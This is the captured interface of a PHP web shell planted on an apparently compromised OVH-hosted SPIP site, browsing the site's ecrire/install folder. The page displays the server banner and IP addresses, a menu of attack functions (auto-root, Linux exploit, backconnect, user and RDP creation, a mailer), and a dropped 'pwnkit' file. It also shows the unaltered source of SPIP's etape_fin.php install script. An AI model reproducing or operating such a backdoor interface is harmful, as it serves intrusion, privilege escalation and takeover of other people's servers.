Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
ecrire /
install /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
etape_.php
1.58
KB
-rw----r--
etape_1.php
2.74
KB
-rw----r--
etape_2.php
5.66
KB
-rw----r--
etape_3.php
11.17
KB
-rw----r--
etape_3b.php
6.24
KB
-rw----r--
etape_4.php
2.56
KB
-rw----r--
etape_chmod.php
4.07
KB
-rw----r--
etape_fin.php
2.48
KB
-rw----r--
etape_ldap1.php
2.58
KB
-rw----r--
etape_ldap2.php
3.65
KB
-rw----r--
etape_ldap3.php
2.89
KB
-rw----r--
etape_ldap4.php
3.63
KB
-rw----r--
etape_ldap5.php
4.13
KB
-rw----r--
index.php
2
B
-rw----r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : etape_fin.php
<?php /***************************************************************************\ * SPIP, Système de publication pour l'internet * * * * Copyright © avec tendresse depuis 2001 * * Arnaud Martin, Antoine Pitrou, Philippe Rivière, Emmanuel Saint-James * * * * Ce programme est un logiciel libre distribué sous licence GNU/GPL. * \***************************************************************************/ if (!defined('_ECRIRE_INC_VERSION')) { return; } include_spip('inc/headers'); include_spip('inc/acces'); // Mise en place des fichiers de configuration si ce n'est fait function install_etape_fin_dist() { ecrire_acces(); $f = str_replace(_FILE_TMP_SUFFIX, '.php', _FILE_CHMOD_TMP); if (file_exists(_FILE_CHMOD_TMP)) { if (!@rename(_FILE_CHMOD_TMP, $f)) { if (@copy(_FILE_CHMOD_TMP, $f)) { spip_unlink(_FILE_CHMOD_TMP); } } } $f = str_replace(_FILE_TMP_SUFFIX, '.php', _FILE_CONNECT_TMP); if (file_exists(_FILE_CONNECT_TMP)) { spip_log("renomme $f"); if (!@rename(_FILE_CONNECT_TMP, $f)) { if (@copy(_FILE_CONNECT_TMP, $f)) { @spip_unlink(_FILE_CONNECT_TMP); } } } // creer le repertoire cache, qui sert partout ! // deja fait en etape 4 en principe, on garde au cas ou if (!@file_exists(_DIR_CACHE)) { $rep = preg_replace(',' . _DIR_TMP . ',', '', _DIR_CACHE); $rep = sous_repertoire(_DIR_TMP, $rep, true, true); } // Verifier la securite des htaccess // Si elle ne fonctionne pas, prevenir $msg = install_verifier_htaccess(); if ($msg) { $cible = _T('public:accueil_site'); $cible = generer_form_ecrire('accueil', '', '', $cible); $minipage = new Spip\Afficher\Minipage\Installation(); echo $minipage->page($msg . $cible); // ok, deboucher dans l'espace prive } else { redirige_url_ecrire('accueil'); } } function install_verifier_htaccess() { if ( verifier_htaccess(_DIR_TMP, true) and verifier_htaccess(_DIR_CONNECT, true) and verifier_htaccess(_DIR_VENDOR, true) ) { return ''; } $titre = _T('htaccess_inoperant'); $averti = _T( 'htaccess_a_simuler', [ 'htaccess' => '<tt>' . _ACCESS_FILE_NAME . '</tt>', 'constantes' => '<tt>_DIR_TMP & _DIR_CONNECT</tt>', 'document_root' => '<tt>' . $_SERVER['DOCUMENT_ROOT'] . '</tt>' ] ); return "<div class='error'><h3>$titre</h3><p>$averti</p></div>"; }
Close